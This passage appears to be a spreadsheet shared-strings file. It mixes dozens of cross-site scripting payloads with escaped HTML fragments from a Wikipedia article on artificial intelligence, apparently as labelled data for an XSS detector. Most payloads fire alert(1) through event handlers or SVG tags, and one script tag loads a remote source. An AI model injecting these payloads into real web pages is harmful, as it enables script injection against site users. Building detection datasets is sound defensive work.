    <t>&lt;dd draggable="true" ondragenter="alert(1)"&gt;test&lt;/dd&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">        &lt;script src="_static/doctools.js"&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;element id=x tabindex=1 onfocus=alert(1)&gt;&lt;/element&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-sutskever2014-272"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-sutskever2014_272-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;tr onmouseleave="alert(1)"&gt;test&lt;/tr&gt;</t>
  </si>
  <si>
    <t>Formal methods are now preferred ("Victory of the &lt;a href="/wiki/Neats_vs._scruffies" class="mw-redirect" title="Neats vs. scruffies"&gt;neats &lt;/a&gt;"):</t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;See also: &lt;a href="/wiki/Mass_surveillance_in_China" title="Mass surveillance in China"&gt;Mass surveillance in China &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-sf-345"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-sf_345-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;cite onmouseleave="alert(1)"&gt;test&lt;/cite&gt;</t>
  </si>
  <si>
    <t>&lt;link onbeforepaste="alert(1)" contenteditable&gt;test&lt;/link&gt;</t>
  </si>
  <si>
    <t>&lt;slot onpointerdown=alert(1)&gt;XSS&lt;/slot&gt;</t>
  </si>
  <si>
    <t>&lt;wbr onpointerup=alert(1)&gt;XSS&lt;/wbr&gt;</t>
  </si>
  <si>
    <t>&lt;bdi onblur=alert(1) tabindex=1 id=x&gt;&lt;/bdi&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt; STYLE=":expression(alert(''))"&gt;</t>
  </si>
  <si>
    <t>&lt;bdi onpointerup=alert(1)&gt;XSS&lt;/bdi&gt;</t>
  </si>
  <si>
    <t>&lt;main onpointerleave=alert(1)&gt;XSS&lt;/main&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a class="mw-selflink selflink"&gt;Artificial intelligence &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;image2 onpointerdown=alert(1)&gt;XSS&lt;/image2&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;&lt;span class="mw-headline" id="Cybernetics_and_brain_simulation"&gt;Cybernetics and brain simulation </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FOOTNOTEDomingos2015Chapter_6,_Chapter_7-73"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-FOOTNOTEDomingos2015Chapter_6,_Chapter_7_73-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;marquee id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/marquee&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Intelligent_agents-179"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Intelligent_agents_179-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;nextid id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/nextid&gt;</t>
  </si>
  <si>
    <t>&lt;fieldset id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t>&lt;ol onbeforecut="alert(1)" contenteditable&gt;test&lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFLugerStubblefield2004"&gt;Luger &amp;amp; Stubblefield 2004 &lt;/a&gt;, pp.&amp;#160;133–150, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;basefont onpointerout=alert(1)&gt;XSS&lt;/basefont&gt;</t>
  </si>
  <si>
    <t>&lt;basefont draggable="true" ondragleave="alert(1)"&gt;test&lt;/basefont&gt;</t>
  </si>
  <si>
    <t>&lt;q draggable="true" ondragstart="alert(1)"&gt;test&lt;/q&gt;</t>
  </si>
  <si>
    <t>&lt;area onblur=alert(1) tabindex=1 id=x&gt;&lt;/area&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;s onkeyup="alert(1)" contenteditable&gt;test&lt;/s&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;head id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;font onmouseenter="alert(1)"&gt;test&lt;/font&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;a href="/wiki/Semantic_Web" title="Semantic Web"&gt;Semantic Web &lt;/a&gt;&lt;span class="nowrap"&gt;&amp;#160; </t>
  </si>
  <si>
    <t>&lt;multicol id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/multicol&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;body onresize="alert(1)"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-278"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-278"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">While McCarthy was primarily concerned with issues in the logical representation of actions, &lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt; apply the term to the more general issue of default reasoning in the vast network of assumptions underlying all our commonsense knowledge. </t>
  </si>
  <si>
    <t>&lt;td onkeypress="alert(1)" contenteditable&gt;test&lt;/td&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;summary style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/summary&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFHawkinsBlakeslee2005"&gt;Hawkins &amp;amp; Blakeslee 2005 &lt;/a&gt; (Hawkins argues that sub-symbolic knowledge should be the primary focus of AI research.) &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;image href=1 onerror=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;textarea onmouseup="alert(1)"&gt;test&lt;/textarea&gt;</t>
  </si>
  <si>
    <t>&lt;blockquote onkeypress="alert(1)" contenteditable&gt;test&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;datalist onblur=alert(1) tabindex=1 id=x&gt;&lt;/datalist&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;tfoot ondblclick="alert(1)"&gt;test&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t>&lt;em draggable="true" ondragend="alert(1)"&gt;test&lt;/em&gt;</t>
  </si>
  <si>
    <t>&lt;menu id=x tabindex=1 onactivate=alert(1)&gt;&lt;/menu&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;menuitem id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t>&lt;progress onblur=alert(1) tabindex=1 id=x&gt;&lt;/progress&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Igor Aizenberg and colleagues introduced it to &lt;a href="/wiki/Artificial_neural_network" title="Artificial neural network"&gt;artificial neural networks &lt;/a&gt; in 2000.&lt;sup id="cite_ref-aizenberg2000_251-0" class="reference"&gt;&lt;a href="#cite_note-aizenberg2000-251"&gt;&amp;#91;240&amp;#93; &lt;/a&gt; &lt;/sup&gt; The first functional Deep Learning networks were published by &lt;a href="/wiki/Alexey_Grigorevich_Ivakhnenko" class="mw-redirect" title="Alexey Grigorevich Ivakhnenko"&gt;Alexey Grigorevich Ivakhnenko &lt;/a&gt; and V. G. Lapa in 1965.&lt;sup id="cite_ref-252" class="reference"&gt;&lt;a href="#cite_note-252"&gt;&amp;#91;241&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup class="noprint Inline-Template" style="white-space:nowrap;"&gt;&amp;#91;&lt;i&gt;&lt;a href="/wiki/Wikipedia:Citing_sources" title="Wikipedia:Citing sources"&gt;&lt;span title="This citation requires a reference to the specific page or range of pages in which the material appears. (December 2016)"&gt;page&amp;#160;needed </t>
  </si>
  <si>
    <t>&lt;ruby onpointermove=alert(1)&gt;XSS&lt;/ruby&gt;</t>
  </si>
  <si>
    <t>&lt;frameset onkeypress="alert(1)" contenteditable&gt;test&lt;/frameset&gt;</t>
  </si>
  <si>
    <t>&lt;rtc onpointerenter=alert(1)&gt;XSS&lt;/rtc&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFWengMcClellandPentlandSporns2001" class="citation journal"&gt;Weng, J.; McClelland; Pentland, A.; Sporns, O.; Stockman, I.; Sur, M.; Thelen, E. (2001). &lt;a rel="nofollow" class="external text" href="http://www.cse.msu.edu/dl/SciencePaper.pdf"&gt;"Autonomous mental development by robots and animals" &lt;/a&gt; &lt;span class="cs1-format"&gt;(PDF) </t>
  </si>
  <si>
    <t>&lt;head onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/head&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;blockquote style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">          &lt;dd&gt;&lt;a href="/en/1.6/"&gt;1.6&lt;/a&gt;&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;bgsound onmouseup="alert(1)"&gt;test&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t>&lt;section onmouseleave="alert(1)"&gt;test&lt;/section&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;thead style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/thead&gt;</t>
  </si>
  <si>
    <t>&lt;content oncontextmenu="alert(1)"&gt;test&lt;/content&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFNilsson1998"&gt;Nilsson 1998 &lt;/a&gt;, chpt. ≈17.1–17.4 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;marquee onbeforecopy="alert(1)" contenteditable&gt;test&lt;/marquee&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r935243608"/&gt; Presidential Address to the &lt;a href="/wiki/Association_for_the_Advancement_of_Artificial_Intelligence" title="Association for the Advancement of Artificial Intelligence"&gt;Association for the Advancement of Artificial Intelligence &lt;/a&gt;. &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;samp draggable="true" ondragenter="alert(1)"&gt;test&lt;/samp&gt;</t>
  </si>
  <si>
    <t>&lt;bgsound onbeforecut="alert(1)" contenteditable&gt;test&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t>&lt;details oncontextmenu="alert(1)"&gt;test&lt;/details&gt;</t>
  </si>
  <si>
    <t>&lt;canvas onpaste="alert(1)" contenteditable&gt;test&lt;/canvas&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=Business+Insider&amp;amp;rft.atitle=Mark+Zuckerberg+responds+to+Elon+Musk%27s+paranoia+about+AI%3A+%27AI+is+going+to...+help+keep+our+communities+safe.%27&amp;amp;rft.date=2018-05-25&amp;amp;rft_id=https%3A%2F%2Fwww.businessinsider.com%2Fmark-zuckerberg-shares-thoughts-elon-musks-ai-2018-5&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;basefont onpointermove=alert(1)&gt;XSS&lt;/basefont&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFCrevier1993"&gt;Crevier 1993 &lt;/a&gt;, pp.&amp;#160;161–162,197–203, 211, 240 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;aside onmousedown="alert(1)"&gt;test&lt;/aside&gt;</t>
  </si>
  <si>
    <t>&lt;datalist id=x tabindex=1 onactivate=alert(1)&gt;&lt;/datalist&gt;</t>
  </si>
  <si>
    <t>&lt;svg onpointermove=alert(1)&gt;XSS&lt;/svg&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;track id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/track&gt;</t>
  </si>
  <si>
    <t>&lt;menuitem onpointerover=alert(1)&gt;XSS&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t>&lt;colgroup oncut="alert(1)" contenteditable&gt;test&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t>&lt;rb draggable="true" ondrag="alert(1)"&gt;test&lt;/rb&gt;</t>
  </si>
  <si>
    <t>&lt;ul onpointerover=alert(1)&gt;XSS&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;time id=x tabindex=1 onfocus=alert(1)&gt;&lt;/time&gt;</t>
  </si>
  <si>
    <t>&lt;font onbeforepaste="alert(1)" contenteditable&gt;test&lt;/font&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Glossary_of_environmental_science" title="Glossary of environmental science"&gt;Environmental science &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;template onpointerup=alert(1)&gt;XSS&lt;/template&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;Gallagher, James (26 January 2017). &lt;a rel="nofollow" class="external text" href="https://www.bbc.co.uk/news/health-38717928"&gt;"Artificial intelligence 'as good as cancer doctors&lt;span class="cs1-kern-right"&gt;' </t>
  </si>
  <si>
    <t>&lt;b onblur=alert(1) tabindex=1 id=x&gt;&lt;/b&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;image onbeforecut="alert(1)" contenteditable&gt;test&lt;/image&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;dialog onload=alert(1)&gt;&lt;/dialog&gt;</t>
  </si>
  <si>
    <t>&lt;data draggable="true" ondragleave="alert(1)"&gt;test&lt;/data&gt;</t>
  </si>
  <si>
    <t>&lt;nobr onclick="alert(1)"&gt;test&lt;/nobr&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;a href="/wiki/David_Chalmers" title="David Chalmers"&gt;David Chalmers &lt;/a&gt; identified two problems in understanding the mind, which he named the "hard" and "easy" problems of consciousness.&lt;sup id="cite_ref-Chalmers_401-0" class="reference"&gt;&lt;a href="#cite_note-Chalmers-401"&gt;&amp;#91;390&amp;#93; &lt;/a&gt; &lt;/sup&gt; The easy problem is understanding how the brain processes signals, makes plans and controls behavior. The hard problem is explaining how this &lt;i&gt;feels &lt;/i&gt; or why it should feel like anything at all. Human &lt;a href="/wiki/Information_processing" title="Information processing"&gt;information processing &lt;/a&gt; is easy to explain, however human &lt;a href="/wiki/Subjective_experience" class="mw-redirect" title="Subjective experience"&gt;subjective experience &lt;/a&gt; is difficult to explain.</t>
  </si>
  <si>
    <t>&lt;listing id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/listing&gt;</t>
  </si>
  <si>
    <t>&lt;body onpointerleave=alert(1)&gt;XSS&lt;/body&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Michael_Polanyi" title="Michael Polanyi"&gt;Michael Polanyi &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;details style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/details&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;var id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/var&gt;</t>
  </si>
  <si>
    <t>&lt;footer draggable="true" ondragstart="alert(1)"&gt;test&lt;/footer&gt;</t>
  </si>
  <si>
    <t>&lt;bgsound onpointerover=alert(1)&gt;XSS&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;template id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/template&gt;</t>
  </si>
  <si>
    <t>&lt;strike onmouseleave="alert(1)"&gt;test&lt;/strike&gt;</t>
  </si>
  <si>
    <t>&lt;animate onpointerup=alert(1)&gt;XSS&lt;/animate&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">        &lt;script src="_static/underscore.js"&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h4&gt;&lt;span class="mw-headline" id="Consciousness"&gt;Consciousness </t>
  </si>
  <si>
    <t>&lt;tfoot onbeforecut="alert(1)" contenteditable&gt;test&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Jennifer_Wilby" title="Jennifer Wilby"&gt;Jennifer Wilby &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;caption draggable="true" ondragstart="alert(1)"&gt;test&lt;/caption&gt;</t>
  </si>
  <si>
    <t>&lt;listing draggable="true" ondragend="alert(1)"&gt;test&lt;/listing&gt;</t>
  </si>
  <si>
    <t>&lt;fieldset onpointerleave=alert(1)&gt;XSS&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Holographic_data_storage" title="Holographic data storage"&gt;Holographic data storage &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Machine_learning" title="Machine learning"&gt;Machine learning &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Superintelligence </t>
  </si>
  <si>
    <t>&lt;area onpointerdown=alert(1)&gt;XSS&lt;/area&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Thought-capable &lt;a href="/wiki/Artificial_being" class="mw-redirect" title="Artificial being"&gt;artificial beings &lt;/a&gt; appeared as &lt;a href="/wiki/Storytelling_device" class="mw-redirect" title="Storytelling device"&gt;storytelling devices &lt;/a&gt; in antiquity,&lt;sup id="cite_ref-AI_in_myth_26-0" class="reference"&gt;&lt;a href="#cite_note-AI_in_myth-26"&gt;&amp;#91;26&amp;#93; &lt;/a&gt; &lt;/sup&gt; and have been common in fiction, as in &lt;a href="/wiki/Mary_Shelley" title="Mary Shelley"&gt;Mary Shelley &lt;/a&gt;'s &lt;i&gt;&lt;a href="/wiki/Frankenstein" title="Frankenstein"&gt;Frankenstein &lt;/a&gt; &lt;/i&gt; or &lt;a href="/wiki/Karel_%C4%8Capek" title="Karel Čapek"&gt;Karel Čapek &lt;/a&gt;'s &lt;i&gt;&lt;a href="/wiki/R.U.R._(Rossum%27s_Universal_Robots)" class="mw-redirect" title="R.U.R. (Rossum&amp;#39;s Universal Robots)"&gt;R.U.R. (Rossum's Universal Robots) &lt;/a&gt; &lt;/i&gt;.&lt;sup id="cite_ref-AI_in_early_science_fiction_27-0" class="reference"&gt;&lt;a href="#cite_note-AI_in_early_science_fiction-27"&gt;&amp;#91;27&amp;#93; &lt;/a&gt; &lt;/sup&gt; These characters and their fates raised many of the same issues now discussed in the &lt;a href="/wiki/Ethics_of_artificial_intelligence" title="Ethics of artificial intelligence"&gt;ethics of artificial intelligence &lt;/a&gt;.&lt;sup id="cite_ref-McCorduck&amp;#39;s_thesis_21-1" class="reference"&gt;&lt;a href="#cite_note-McCorduck&amp;#39;s_thesis-21"&gt;&amp;#91;21&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Emergent_materialism" title="Emergent materialism"&gt;Emergent materialism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;br id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/br&gt;</t>
  </si>
  <si>
    <t>&lt;optgroup oncut="alert(1)" contenteditable&gt;test&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;map style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/map&gt;</t>
  </si>
  <si>
    <t>&lt;command onmouseup="alert(1)"&gt;test&lt;/command&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">             &lt;/li&gt;&lt;li style="min-height: 31px;"&gt;&lt;span style="display: inline-block; width: 31px; line-height: 31px; vertical-align: middle; text-align: center;"&gt;&lt;img alt="" src="//upload.wikimedia.org/wikipedia/en/thumb/4/4a/Commons-logo.svg/20px-Commons-logo.svg.png" decoding="async" width="20" height="27" style="vertical-align: middle" srcset="//upload.wikimedia.org/wikipedia/en/thumb/4/4a/Commons-logo.svg/30px-Commons-logo.svg.png 1.5x, //upload.wikimedia.org/wikipedia/en/thumb/4/4a/Commons-logo.svg/40px-Commons-logo.svg.png 2x" data-file-width="1024" data-file-height="1376" /&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=www.mileseducation.com&amp;amp;rft.atitle=Miles+Education+%7C+Future+Of+Finance+%7C+Blockchain+Fundamentals+for+F%26A+Professionals+Certificate&amp;amp;rft_id=https%3A%2F%2Fwww.mileseducation.com%2Ffinance%2Fartificial_intelligence&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;bdi oncut="alert(1)" contenteditable&gt;test&lt;/bdi&gt;</t>
  </si>
  <si>
    <t>&lt;ol draggable="true" ondragstart="alert(1)"&gt;test&lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;option onbeforepaste="alert(1)" contenteditable&gt;test&lt;/option&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;source id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/source&gt;</t>
  </si>
  <si>
    <t>&lt;data onmouseout="alert(1)"&gt;test&lt;/data&gt;</t>
  </si>
  <si>
    <t>&lt;section onclick="alert(1)"&gt;test&lt;/section&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;noscript onload=alert(1)&gt;&lt;/noscript&gt;</t>
  </si>
  <si>
    <t>&lt;col id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/col&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;bdo onbeforepaste="alert(1)" contenteditable&gt;test&lt;/bdo&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; [&lt;a rel="nofollow" class="external text" href="//arxiv.org/archive/cs.CV"&gt;cs.CV &lt;/a&gt;]. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=preprint&amp;amp;rft.jtitle=arXiv&amp;amp;rft.atitle=Show+and+Tell%3A+A+Neural+Image+Caption+Generator&amp;amp;rft.date=2015&amp;amp;rft_id=info%3Aarxiv%2F1411.4555&amp;amp;rft.aulast=Vinyals&amp;amp;rft.aufirst=Oriol&amp;amp;rft.au=Toshev%2C+Alexander&amp;amp;rft.au=Bengio%2C+Samy&amp;amp;rft.au=Erhan%2C+Dumitru&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Existential risk </t>
  </si>
  <si>
    <t>&lt;param onpointerdown=alert(1)&gt;XSS&lt;/param&gt;</t>
  </si>
  <si>
    <t>&lt;applet onpointerdown=alert(1)&gt;XSS&lt;/applet&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;template style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/template&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=BBC+News&amp;amp;rft.atitle=Single+pixel+change+fools+AI+programs&amp;amp;rft.date=2017-11-03&amp;amp;rft_id=https%3A%2F%2Fwww.bbc.com%2Fnews%2Ftechnology-41845878&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-36"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-36"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;rb oncut="alert(1)" contenteditable&gt;test&lt;/rb&gt;</t>
  </si>
  <si>
    <t>&lt;input onpointerenter=alert(1)&gt;XSS&lt;/input&gt;</t>
  </si>
  <si>
    <t>&lt;th onbeforecopy="alert(1)" contenteditable&gt;test&lt;/th&gt;</t>
  </si>
  <si>
    <t>&lt;SCRIPT a=`&gt;` SRC="httx://.rocks/.js"&gt;&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t>&lt;del onmousedown="alert(1)"&gt;test&lt;/del&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-lecun2016slides-257"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-lecun2016slides_257-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;svg id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/svg&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-acm-347"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-acm_347-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;link rel="EditURI" type="application/rsd+xml" href="//en.wikipedia.org/w/api.php?action=rsd"/&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;ol style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/ol&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFOudeyer2010"&gt;Oudeyer 2010 &lt;/a&gt;. </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation book"&gt;&lt;a href="/wiki/Stuart_J._Russell" title="Stuart J. Russell"&gt;Stuart J. Russell &lt;/a&gt;; &lt;a href="/wiki/Peter_Norvig" title="Peter Norvig"&gt;Peter Norvig &lt;/a&gt; (2010). "26.1.2: Philosophical Foundations/Weak AI: Can Machines Act Intelligently?/The mathematical objection". &lt;a href="/wiki/Artificial_Intelligence:_A_Modern_Approach" title="Artificial Intelligence: A Modern Approach"&gt;&lt;i&gt;Artificial Intelligence: A Modern Approach &lt;/i&gt; &lt;/a&gt; (3rd ed.). Upper Saddle River, NJ: &lt;a href="/wiki/Prentice_Hall" title="Prentice Hall"&gt;Prentice Hall &lt;/a&gt;. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-13-604259-4" title="Special:BookSources/978-0-13-604259-4"&gt;&lt;bdi&gt;978-0-13-604259-4 &lt;/bdi&gt; &lt;/a&gt;. &lt;q&gt;even if we grant that computers have limitations on what they can prove, there is no evidence that humans are immune from those limitations. &lt;/q&gt; &lt;/cite&gt;&lt;span 